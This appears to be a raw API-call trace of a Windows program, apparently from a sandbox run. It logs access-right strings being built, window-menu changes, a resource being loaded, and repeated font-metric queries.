[0149.815] SysReAllocStringLen (in: pbstr=0x2a3e230*=0x0, psz="PRINTER_WRITE", len=0xd | out: pbstr=0x2a3e230*="PRINTER_WRITE") returned 1
[0149.815] SysReAllocStringLen (in: pbstr=0x2a3e220*=0x0, psz="PRINTER_READ", len=0xc | out: pbstr=0x2a3e220*="PRINTER_READ") returned 1
[0149.815] SysReAllocStringLen (in: pbstr=0x2a3e210*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x2a3e210*="PRINTER_ALL_ACCESS") returned 1
[0149.815] SysReAllocStringLen (in: pbstr=0x2a3e200*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e200*="DELETE") returned 1
[0149.816] SysReAllocStringLen (in: pbstr=0x2a3e1f0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e1f0*="READ_CONTROL") returned 1
[0149.816] SysReAllocStringLen (in: pbstr=0x2a3e1e0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e1e0*="WRITE_OWNER") returned 1
[0149.816] SysReAllocStringLen (in: pbstr=0x2a3e1d0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e1d0*="WRITE_DAC") returned 1
[0149.816] SysReAllocStringLen (in: pbstr=0x2a3e1c0*=0x0, psz="SC_MANAGER_QUERY_LOCK_STATUS", len=0x1c | out: pbstr=0x2a3e1c0*="SC_MANAGER_QUERY_LOCK_STATUS") returned 1
[0149.816] SysReAllocStringLen (in: pbstr=0x2a3e1b0*=0x0, psz="SC_MANAGER_MODIFY_BOOT_CONFIG", len=0x1d | out: pbstr=0x2a3e1b0*="SC_MANAGER_MODIFY_BOOT_CONFIG") returned 1
[0149.816] SysReAllocStringLen (in: pbstr=0x2a3e1a0*=0x0, psz="SC_MANAGER_LOCK", len=0xf | out: pbstr=0x2a3e1a0*="SC_MANAGER_LOCK") returned 1
[0149.816] SysReAllocStringLen (in: pbstr=0x2a3e190*=0x0, psz="SC_MANAGER_ENUMERATE_SERVICE", len=0x1c | out: pbstr=0x2a3e190*="SC_MANAGER_ENUMERATE_SERVICE") returned 1
[0149.816] SysReAllocStringLen (in: pbstr=0x2a3e180*=0x0, psz="SC_MANAGER_CONNECT", len=0x12 | out: pbstr=0x2a3e180*="SC_MANAGER_CONNECT") returned 1
[0149.816] SysReAllocStringLen (in: pbstr=0x2a3e170*=0x0, psz="SC_MANAGER_CREATE_SERVICE", len=0x19 | out: pbstr=0x2a3e170*="SC_MANAGER_CREATE_SERVICE") returned 1
[0149.816] SysReAllocStringLen (in: pbstr=0x2a3e160*=0x0, psz="SC_MANAGER_ALL_ACCESS", len=0x15 | out: pbstr=0x2a3e160*="SC_MANAGER_ALL_ACCESS") returned 1
[0149.816] SysReAllocStringLen (in: pbstr=0x2a3e150*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e150*="STANDARD_RIGHTS_EXECUTE") returned 1
[0149.816] SysReAllocStringLen (in: pbstr=0x2a3e140*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e140*="STANDARD_RIGHTS_WRITE") returned 1
[0149.816] SysReAllocStringLen (in: pbstr=0x2a3e130*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e130*="STANDARD_RIGHTS_READ") returned 1
[0149.816] SysReAllocStringLen (in: pbstr=0x2a3e120*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e120*="STANDARD_RIGHTS_ALL") returned 1
[0149.816] SysReAllocStringLen (in: pbstr=0x2a3e110*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e110*="DELETE") returned 1
[0149.816] SysReAllocStringLen (in: pbstr=0x2a3e100*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e100*="READ_CONTROL") returned 1
[0149.816] SysReAllocStringLen (in: pbstr=0x2a3e0f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e0f0*="WRITE_OWNER") returned 1
[0149.816] SysReAllocStringLen (in: pbstr=0x2a3e0e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e0e0*="WRITE_DAC") returned 1
[0149.816] SysReAllocStringLen (in: pbstr=0x2a3e0d0*=0x0, psz="SERVICE_USER_DEFINED_CONTROL", len=0x1c | out: pbstr=0x2a3e0d0*="SERVICE_USER_DEFINED_CONTROL") returned 1
[0149.816] SysReAllocStringLen (in: pbstr=0x2a3e0c0*=0x0, psz="SERVICE_STOP", len=0xc | out: pbstr=0x2a3e0c0*="SERVICE_STOP") returned 1
[0149.816] SysReAllocStringLen (in: pbstr=0x2a3e0b0*=0x0, psz="SERVICE_START", len=0xd | out: pbstr=0x2a3e0b0*="SERVICE_START") returned 1
[0149.816] SysReAllocStringLen (in: pbstr=0x2a3e0a0*=0x0, psz="SERVICE_QUERY_STATUS", len=0x14 | out: pbstr=0x2a3e0a0*="SERVICE_QUERY_STATUS") returned 1
[0149.816] SysReAllocStringLen (in: pbstr=0x2a3e090*=0x0, psz="SERVICE_QUERY_CONFIG", len=0x14 | out: pbstr=0x2a3e090*="SERVICE_QUERY_CONFIG") returned 1
[0149.817] SysReAllocStringLen (in: pbstr=0x2a3e080*=0x0, psz="SERVICE_PAUSE_CONTINUE", len=0x16 | out: pbstr=0x2a3e080*="SERVICE_PAUSE_CONTINUE") returned 1
[0149.817] SysReAllocStringLen (in: pbstr=0x2a3e070*=0x0, psz="SERVICE_INTERROGATE", len=0x13 | out: pbstr=0x2a3e070*="SERVICE_INTERROGATE") returned 1
[0149.817] SysReAllocStringLen (in: pbstr=0x2a3e060*=0x0, psz="SERVICE_ENUMERATE_DEPENDENTS", len=0x1c | out: pbstr=0x2a3e060*="SERVICE_ENUMERATE_DEPENDENTS") returned 1
[0149.817] SysReAllocStringLen (in: pbstr=0x2a3e050*=0x0, psz="SERVICE_CHANGE_CONFIG", len=0x15 | out: pbstr=0x2a3e050*="SERVICE_CHANGE_CONFIG") returned 1
[0149.817] SysReAllocStringLen (in: pbstr=0x2a3e040*=0x0, psz="SERVICE_ALL_ACCESS", len=0x12 | out: pbstr=0x2a3e040*="SERVICE_ALL_ACCESS") returned 1
[0149.817] SysReAllocStringLen (in: pbstr=0x2a3e030*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e030*="STANDARD_RIGHTS_EXECUTE") returned 1
[0149.817] SysReAllocStringLen (in: pbstr=0x2a3e020*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e020*="STANDARD_RIGHTS_WRITE") returned 1
[0149.817] SysReAllocStringLen (in: pbstr=0x2a3e010*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e010*="STANDARD_RIGHTS_READ") returned 1
[0149.817] SysReAllocStringLen (in: pbstr=0x2a3e000*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e000*="STANDARD_RIGHTS_ALL") returned 1
[0149.817] SysReAllocStringLen (in: pbstr=0x2a3dff0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3dff0*="DELETE") returned 1
[0149.817] SysReAllocStringLen (in: pbstr=0x2a3dfe0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3dfe0*="READ_CONTROL") returned 1
[0149.817] SysReAllocStringLen (in: pbstr=0x2a3dfd0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3dfd0*="WRITE_OWNER") returned 1
[0149.817] SysReAllocStringLen (in: pbstr=0x2a3dfc0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3dfc0*="WRITE_DAC") returned 1
[0149.817] SysReAllocStringLen (in: pbstr=0x2a3dfb0*=0x0, psz="KEY_SET_VALUE", len=0xd | out: pbstr=0x2a3dfb0*="KEY_SET_VALUE") returned 1
[0149.817] SysReAllocStringLen (in: pbstr=0x2a3dfa0*=0x0, psz="KEY_CREATE_LINK", len=0xf | out: pbstr=0x2a3dfa0*="KEY_CREATE_LINK") returned 1
[0149.817] SysReAllocStringLen (in: pbstr=0x2a3df90*=0x0, psz="KEY_CREATE_SUB_KEY", len=0x12 | out: pbstr=0x2a3df90*="KEY_CREATE_SUB_KEY") returned 1
[0149.817] SysReAllocStringLen (in: pbstr=0x2a3df80*=0x0, psz="KEY_NOTIFY", len=0xa | out: pbstr=0x2a3df80*="KEY_NOTIFY") returned 1
[0149.817] SysReAllocStringLen (in: pbstr=0x2a3df70*=0x0, psz="KEY_ENUMERATE_SUB_KEYS", len=0x16 | out: pbstr=0x2a3df70*="KEY_ENUMERATE_SUB_KEYS") returned 1
[0149.817] SysReAllocStringLen (in: pbstr=0x2a3df60*=0x0, psz="KEY_QUERY_VALUE", len=0xf | out: pbstr=0x2a3df60*="KEY_QUERY_VALUE") returned 1
[0149.817] SysReAllocStringLen (in: pbstr=0x2a3df50*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3df50*="STANDARD_RIGHTS_EXECUTE") returned 1
[0149.817] SysReAllocStringLen (in: pbstr=0x2a3df40*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3df40*="STANDARD_RIGHTS_WRITE") returned 1
[0149.817] SysReAllocStringLen (in: pbstr=0x2a3df30*=0x0, psz="STANDARD_RIGHTS_READ 2", len=0x16 | out: pbstr=0x2a3df30*="STANDARD_RIGHTS_READ 2") returned 1
[0149.817] SysReAllocStringLen (in: pbstr=0x2a3df20*=0x0, psz="STANDARD_RIGHTS_ALL 1", len=0x15 | out: pbstr=0x2a3df20*="STANDARD_RIGHTS_ALL 1") returned 1
[0149.818] SysReAllocStringLen (in: pbstr=0x2a3df10*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3df10*="DELETE") returned 1
[0149.818] SysReAllocStringLen (in: pbstr=0x2a3df00*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3df00*="READ_CONTROL") returned 1
[0149.818] SysReAllocStringLen (in: pbstr=0x2a3def0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3def0*="WRITE_OWNER") returned 1
[0149.818] SysReAllocStringLen (in: pbstr=0x2a3dee0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3dee0*="WRITE_DAC") returned 1
[0149.818] SysReAllocStringLen (in: pbstr=0x2a3ded0*=0x0, psz="DESKTOP_SWITCHDESKTOP", len=0x15 | out: pbstr=0x2a3ded0*="DESKTOP_SWITCHDESKTOP") returned 1
[0149.818] SysReAllocStringLen (in: pbstr=0x2a3dec0*=0x0, psz="DESKTOP_WRITEOBJECTS", len=0x14 | out: pbstr=0x2a3dec0*="DESKTOP_WRITEOBJECTS") returned 1
[0149.818] SysReAllocStringLen (in: pbstr=0x2a3deb0*=0x0, psz="DESKTOP_JOURNALRECORD", len=0x15 | out: pbstr=0x2a3deb0*="DESKTOP_JOURNALRECORD") returned 1
[0149.818] SysReAllocStringLen (in: pbstr=0x2a3dea0*=0x0, psz="DESKTOP_JOURNALPLAYBACK", len=0x17 | out: pbstr=0x2a3dea0*="DESKTOP_JOURNALPLAYBACK") returned 1
[0149.818] SysReAllocStringLen (in: pbstr=0x2a3de90*=0x0, psz="DESKTOP_HOOKCONTROL", len=0x13 | out: pbstr=0x2a3de90*="DESKTOP_HOOKCONTROL") returned 1
[0149.818] SysReAllocStringLen (in: pbstr=0x2a3de80*=0x0, psz="DESKTOP_CREATEWINDOW", len=0x14 | out: pbstr=0x2a3de80*="DESKTOP_CREATEWINDOW") returned 1
[0149.818] SysReAllocStringLen (in: pbstr=0x2a3de70*=0x0, psz="DESKTOP_CREATEMENU", len=0x12 | out: pbstr=0x2a3de70*="DESKTOP_CREATEMENU") returned 1
[0149.818] SysReAllocStringLen (in: pbstr=0x2a3de60*=0x0, psz="DESKTOP_READOBJECTS", len=0x13 | out: pbstr=0x2a3de60*="DESKTOP_READOBJECTS") returned 1
[0149.818] SysReAllocStringLen (in: pbstr=0x2a3de50*=0x0, psz="DESKTOP_ENUMERATE", len=0x11 | out: pbstr=0x2a3de50*="DESKTOP_ENUMERATE") returned 1
[0149.818] SysReAllocStringLen (in: pbstr=0x2a3de40*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3de40*="STANDARD_RIGHTS_EXECUTE") returned 1
[0149.818] SysReAllocStringLen (in: pbstr=0x2a3de30*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3de30*="STANDARD_RIGHTS_WRITE") returned 1
[0149.818] SysReAllocStringLen (in: pbstr=0x2a3de20*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3de20*="STANDARD_RIGHTS_READ") returned 1
[0149.818] SysReAllocStringLen (in: pbstr=0x2a3de10*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3de10*="STANDARD_RIGHTS_ALL") returned 1
[0149.818] SysReAllocStringLen (in: pbstr=0x2a3de00*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3de00*="DELETE") returned 1
[0149.818] SysReAllocStringLen (in: pbstr=0x2a3ddf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3ddf0*="READ_CONTROL") returned 1
[0149.818] SysReAllocStringLen (in: pbstr=0x2a3dde0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3dde0*="WRITE_OWNER") returned 1
[0149.818] SysReAllocStringLen (in: pbstr=0x2a3ddd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3ddd0*="WRITE_DAC") returned 1
[0149.818] SysReAllocStringLen (in: pbstr=0x2a3ddc0*=0x0, psz="WINSTA_WRITEATTRIBUTES", len=0x16 | out: pbstr=0x2a3ddc0*="WINSTA_WRITEATTRIBUTES") returned 1
[0149.818] SysReAllocStringLen (in: pbstr=0x2a3ddb0*=0x0, psz="WINSTA_READSCREEN", len=0x11 | out: pbstr=0x2a3ddb0*="WINSTA_READSCREEN") returned 1
[0149.819] SysReAllocStringLen (in: pbstr=0x2a3dda0*=0x0, psz="WINSTA_READATTRIBUTES", len=0x15 | out: pbstr=0x2a3dda0*="WINSTA_READATTRIBUTES") returned 1
[0149.819] SysReAllocStringLen (in: pbstr=0x2a3dd90*=0x0, psz="WINSTA_EXITWINDOWS", len=0x12 | out: pbstr=0x2a3dd90*="WINSTA_EXITWINDOWS") returned 1
[0149.819] SysReAllocStringLen (in: pbstr=0x2a3dd80*=0x0, psz="WINSTA_ENUMERATE", len=0x10 | out: pbstr=0x2a3dd80*="WINSTA_ENUMERATE") returned 1
[0149.819] SysReAllocStringLen (in: pbstr=0x2a3dd70*=0x0, psz="WINSTA_ENUMDESKTOPS", len=0x13 | out: pbstr=0x2a3dd70*="WINSTA_ENUMDESKTOPS") returned 1
[0149.819] SysReAllocStringLen (in: pbstr=0x2a3dd60*=0x0, psz="WINSTA_CREATEDESKTOP", len=0x14 | out: pbstr=0x2a3dd60*="WINSTA_CREATEDESKTOP") returned 1
[0149.819] SysReAllocStringLen (in: pbstr=0x2a3dd50*=0x0, psz="WINSTA_ACCESSGLOBALATOMS", len=0x18 | out: pbstr=0x2a3dd50*="WINSTA_ACCESSGLOBALATOMS") returned 1
[0149.819] SysReAllocStringLen (in: pbstr=0x2a3dd40*=0x0, psz="WINSTA_ACCESSCLIPBOARD", len=0x16 | out: pbstr=0x2a3dd40*="WINSTA_ACCESSCLIPBOARD") returned 1
[0149.819] SysReAllocStringLen (in: pbstr=0x2a3dd30*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3dd30*="STANDARD_RIGHTS_EXECUTE") returned 1
[0149.819] SysReAllocStringLen (in: pbstr=0x2a3dd20*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3dd20*="STANDARD_RIGHTS_WRITE") returned 1
[0149.819] SysReAllocStringLen (in: pbstr=0x2a3dd10*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3dd10*="STANDARD_RIGHTS_READ") returned 1
[0149.819] SysReAllocStringLen (in: pbstr=0x2a3dd00*=0x0, psz="STANDARD_RIGHTS_REQUIRED", len=0x18 | out: pbstr=0x2a3dd00*="STANDARD_RIGHTS_REQUIRED") returned 1
[0149.819] SysReAllocStringLen (in: pbstr=0x2a3dcf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3dcf0*="READ_CONTROL") returned 1
[0149.819] SysReAllocStringLen (in: pbstr=0x2a3dce0*=0x0, psz="SI_ACCESS_SPECIFIC", len=0x12 | out: pbstr=0x2a3dce0*="SI_ACCESS_SPECIFIC") returned 1
[0149.819] SysReAllocStringLen (in: pbstr=0x2a3dcd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3dcd0*="WRITE_DAC") returned 1
[0149.819] SysReAllocStringLen (in: pbstr=0x2a3dcc0*=0x0, psz="FILE_DELETE", len=0xb | out: pbstr=0x2a3dcc0*="FILE_DELETE") returned 1
[0149.819] SysReAllocStringLen (in: pbstr=0x2a3dcb0*=0x0, psz="FILE_DELETE_CHILD", len=0x11 | out: pbstr=0x2a3dcb0*="FILE_DELETE_CHILD") returned 1
[0149.821] SetClassLongA (hWnd=0xa01e6, nIndex=-14, dwNewLong=65575) returned 0x0
[0149.821] GetSystemMenu (hWnd=0xa01e6, bRevert=0) returned 0x7020d
[0149.822] DeleteMenu (hMenu=0x7020d, uPosition=0xf030, uFlags=0x0) returned 1
[0149.822] DeleteMenu (hMenu=0x7020d, uPosition=0xf000, uFlags=0x0) returned 1
[0149.822] DeleteMenu (hMenu=0x7020d, uPosition=0xf010, uFlags=0x0) returned 1
[0149.822] GetCurrentThreadId () returned 0x524
[0149.822] ResetEvent (hEvent=0xa0) returned 1
[0149.822] GetCurrentThreadId () returned 0x524
[0149.822] GetCurrentThreadId () returned 0x524
[0149.822] GetCurrentThreadId () returned 0x524
[0149.822] ResetEvent (hEvent=0xa0) returned 1
[0149.822] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x18f4b4, fWinIni=0x0 | out: pvParam=0x18f4b4) returned 1
[0149.822] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x18f4b4, fWinIni=0x0 | out: pvParam=0x18f4b4) returned 1
[0149.822] GetSystemMetrics (nIndex=49) returned 16
[0149.822] GetSystemMetrics (nIndex=50) returned 16
[0149.823] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x18f4fc, fWinIni=0x0 | out: pvParam=0x18f4fc) returned 1
[0149.823] IsWindowVisible (hWnd=0xa01e6) returned 0
[0149.823] GetCurrentThreadId () returned 0x524
[0149.823] VirtualQuery (in: lpAddress=0x2a11668, lpBuffer=0x18f3cc, dwLength=0x1c | out: lpBuffer=0x18f3cc*(BaseAddress=0x2a11000, AllocationBase=0x2950000, AllocationProtect=0x40, RegionSize=0x52000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c
[0149.823] FindResourceA (hModule=0x2950000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2a58990
[0149.823] FindResourceA (hModule=0x2950000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2a58990
[0149.823] LoadResource (hModule=0x2950000, hResInfo=0x2a58990) returned 0x2a5f044
[0149.824] SizeofResource (hModule=0x2950000, hResInfo=0x2a58990) returned 0xca5
[0149.824] LockResource (hResData=0x2a5f044) returned 0x2a5f044
[0149.824] GetCurrentThreadId () returned 0x524
[0149.824] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x18f180, fWinIni=0x0 | out: pvParam=0x18f180) returned 1
[0149.824] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x18f180, fWinIni=0x0 | out: pvParam=0x18f180) returned 1
[0149.824] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x18f180, fWinIni=0x0 | out: pvParam=0x18f180) returned 1
[0149.824] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x18f180, fWinIni=0x0 | out: pvParam=0x18f180) returned 1
[0149.825] GetDC (hWnd=0x0) returned 0x6401085e
[0149.825] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18f164 | out: lptm=0x18f164) returned 1
[0149.826] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="MS Sans Serif", cchCount1=13, lpString2="Default", cchCount2=7) returned 3
[0149.827] CreateFontIndirectA (lplf=0x18f11c) returned 0xd0a088a
[0149.827] SelectObject (hdc=0x6401085e, h=0xd0a088a) returned 0x18a002e
[0149.827] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18f19c | out: lptm=0x18f19c) returned 1
[0149.828] SelectObject (hdc=0x6401085e, h=0x18a002e) returned 0xd0a088a
[0149.828] ReleaseDC (hWnd=0x0, hDC=0x6401085e) returned 1
[0149.828] GetSystemMetrics (nIndex=6) returned 1
[0149.828] VirtualAlloc (lpAddress=0x2a74000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a74000
[0149.828] GetDC (hWnd=0x0) returned 0x6401085e
[0149.829] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18f164 | out: lptm=0x18f164) returned 1
[0149.829] SelectObject (hdc=0x6401085e, h=0xd0a088a) returned 0x18a002e
[0149.829] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18f19c | out: lptm=0x18f19c) returned 1
[0149.829] SelectObject (hdc=0x6401085e, h=0x18a002e) returned 0xd0a088a
[0149.829] ReleaseDC (hWnd=0x0, hDC=0x6401085e) returned 1
[0149.829] GetSystemMetrics (nIndex=6) returned 1
[0149.829] GetDC (hWnd=0x0) returned 0x6401085e
[0149.829] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18f164 | out: lptm=0x18f164) returned 1
[0149.829] SelectObject (hdc=0x6401085e, h=0xd0a088a) returned 0x18a002e
[0149.829] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18f19c | out: lptm=0x18f19c) returned 1
[0149.829] SelectObject (hdc=0x6401085e, h=0x18a002e) returned 0xd0a088a
[0149.829] ReleaseDC (hWnd=0x0, hDC=0x6401085e) returned 1
[0149.829] GetSystemMetrics (nIndex=6) returned 1
[0149.830] GetDC (hWnd=0x0) returned 0x6401085e
[0149.830] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18f164 | out: lptm=0x18f164) returned 1
[0149.830] SelectObject (hdc=0x6401085e, h=0xd0a088a) returned 0x18a002e
[0149.830] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18f19c | out: lptm=0x18f19c) returned 1
[0149.830] SelectObject (hdc=0x6401085e, h=0x18a002e) returned 0xd0a088a
[0149.830] ReleaseDC (hWnd=0x0, hDC=0x6401085e) returned 1
[0149.830] GetSystemMetrics (nIndex=6) returned 1
[0149.830] GetDC (hWnd=0x0) returned 0x6401085e
[0149.831] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18f178 | out: lptm=0x18f178) returned 1
[0149.831] SelectObject (hdc=0x6401085e, h=0xd0a088a) returned 0x18a002e
[0149.831] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18f1b0 | out: lptm=0x18f1b0) returned 1
[0149.831] SelectObject (hdc=0x6401085e, h=0x18a002e) returned 0xd0a088a
[0149.831] ReleaseDC (hWnd=0x0, hDC=0x6401085e) returned 1
[0149.831] GetSystemMetrics (nIndex=6) returned 1
[0149.831] GetDC (hWnd=0x0) returned 0x6401085e
[0149.831] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18ee7c | out: lptm=0x18ee7c) returned 1
[0149.831] SelectObject (hdc=0x6401085e, h=0xd0a088a) returned 0x18a002e
[0149.831] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18eeb4 | out: lptm=0x18eeb4) returned 1
[0149.831] SelectObject (hdc=0x6401085e, h=0x18a002e) returned 0xd0a088a
[0149.831] ReleaseDC (hWnd=0x0, hDC=0x6401085e) returned 1
[0149.831] GetSystemMetrics (nIndex=6) returned 1
[0149.832] GetDC (hWnd=0x0) returned 0x6401085e
[0149.832] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18f178 | out: lptm=0x18f178) returned 1
[0149.832] SelectObject (hdc=0x6401085e, h=0xd0a088a) returned 0x18a002e
[0149.832] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18f1b0 | out: lptm=0x18f1b0) returned 1
[0149.832] SelectObject (hdc=0x6401085e, h=0x18a002e) returned 0xd0a088a
[0149.832] ReleaseDC (hWnd=0x0, hDC=0x6401085e) returned 1
[0149.832] GetSystemMetrics (nIndex=6) returned 1
[0149.832] GetDC (hWnd=0x0) returned 0x6401085e
[0149.832] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18ee7c | out: lptm=0x18ee7c) returned 1
[0149.832] SelectObject (hdc=0x6401085e, h=0xd0a088a) returned 0x18a002e
[0149.832] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18eeb4 | out: lptm=0x18eeb4) returned 1
[0149.832] SelectObject (hdc=0x6401085e, h=0x18a002e) returned 0xd0a088a
[0149.832] ReleaseDC (hWnd=0x0, hDC=0x6401085e) returned 1
[0149.832] GetSystemMetrics (nIndex=6) returned 1
[0149.833] GetDC (hWnd=0x0) returned 0x6401085e
[0149.833] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18f178 | out: lptm=0x18f178) returned 1
[0149.833] SelectObject (hdc=0x6401085e, h=0xd0a088a) returned 0x18a002e
[0149.833] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18f1b0 | out: lptm=0x18f1b0) returned 1
[0149.833] SelectObject (hdc=0x6401085e, h=0x18a002e) returned 0xd0a088a
[0149.833] ReleaseDC (hWnd=0x0, hDC=0x6401085e) returned 1
[0149.833] GetSystemMetrics (nIndex=6) returned 1
[0149.833] GetDC (hWnd=0x0) returned 0x6401085e
[0149.833] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18ee7c | out: lptm=0x18ee7c) returned 1
[0149.833] SelectObject (hdc=0x6401085e, h=0xd0a088a) returned 0x18a002e
[0149.833] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18eeb4 | out: lptm=0x18eeb4) returned 1
[0149.833] SelectObject (hdc=0x6401085e, h=0x18a002e) returned 0xd0a088a
[0149.833] ReleaseDC (hWnd=0x0, hDC=0x6401085e) returned 1
[0149.833] GetSystemMetrics (nIndex=6) returned 1
[0149.834] GetDC (hWnd=0x0) returned 0x6401085e
[0149.834] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18f164 | out: lptm=0x18f164) returned 1
[0149.834] SelectObject (hdc=0x6401085e, h=0xd0a088a) returned 0x18a002e
[0149.834] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18f19c | out: lptm=0x18f19c) returned 1
[0149.834] SelectObject (hdc=0x6401085e, h=0x18a002e) returned 0xd0a088a
[0149.834] ReleaseDC (hWnd=0x0, hDC=0x6401085e) returned 1
[0149.834] GetSystemMetrics (nIndex=6) returned 1
[0149.834] GetDC (hWnd=0x0) returned 0x6401085e
[0149.834] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18f164 | out: lptm=0x18f164) returned 1
[0149.834] SelectObject (hdc=0x6401085e, h=0xd0a088a) returned 0x18a002e
[0149.834] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18f19c | out: lptm=0x18f19c) returned 1
[0149.835] SelectObject (hdc=0x6401085e, h=0x18a002e) returned 0xd0a088a
[0149.835] ReleaseDC (hWnd=0x0, hDC=0x6401085e) returned 1
[0149.835] GetSystemMetrics (nIndex=6) returned 1
[0149.835] GetDC (hWnd=0x0) returned 0x6401085e
[0149.835] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18f178 | out: lptm=0x18f178) returned 1
[0149.835] SelectObject (hdc=0x6401085e, h=0xd0a088a) returned 0x18a002e
[0149.835] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18f1b0 | out: lptm=0x18f1b0) returned 1
[0149.835] SelectObject (hdc=0x6401085e, h=0x18a002e) returned 0xd0a088a
[0149.835] ReleaseDC (hWnd=0x0, hDC=0x6401085e) returned 1
[0149.835] GetSystemMetrics (nIndex=6) returned 1
[0149.835] GetDC (hWnd=0x0) returned 0x6401085e
[0149.835] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18ee7c | out: lptm=0x18ee7c) returned 1
[0149.835] SelectObject (hdc=0x6401085e, h=0xd0a088a) returned 0x18a002e
[0149.835] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18eeb4 | out: lptm=0x18eeb4) returned 1
[0149.835] SelectObject (hdc=0x6401085e, h=0x18a002e) returned 0xd0a088a
[0149.835] ReleaseDC (hWnd=0x0, hDC=0x6401085e) returned 1
[0149.836] GetSystemMetrics (nIndex=6) returned 1
[0149.836] GetDC (hWnd=0x0) returned 0x6401085e
[0149.836] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18f178 | out: lptm=0x18f178) returned 1
[0149.836] SelectObject (hdc=0x6401085e, h=0xd0a088a) returned 0x18a002e
[0149.836] GetTextMetricsA (in: hdc=0x6401085e, lptm=0x18f1b0 | out: lptm=0x18f1b0) returned 1
[0149.836] SelectObject (hdc=0x6401085e, h=0x18a002e) returned 0xd0a088a
[0149.836] ReleaseDC (hWnd=0x0, hDC=0x6401085e) returned 1
[0149.836] GetSystemMetrics (nIndex=6) returned 1
